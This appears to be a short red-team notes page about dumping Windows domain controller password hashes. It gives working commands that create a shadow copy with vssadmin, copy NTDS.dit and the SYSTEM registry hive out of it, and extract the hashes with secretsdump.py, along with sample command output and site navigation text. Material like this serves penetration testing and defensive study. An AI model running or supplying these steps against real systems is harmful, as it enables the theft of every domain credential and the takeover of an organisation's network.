vssadmin - no credential required

On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.

Dumping Domain Controller Hashes Locally and RemotelyRed Teaming Experiments

CMD> vssadmin create shadow /for=C:

Shadow Copy ID: {8bf57023-7b87-4acc-beab-1902f9705267}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

<CMD> Copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp
<CMD> Copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp

Kali> secretsdump.py -ntds ntds.dit -system system.bak LOCAL

PreviousDiskshadow - No credential required NextWmic and Vssadmin Shadow Copy

Last updated 9 months ago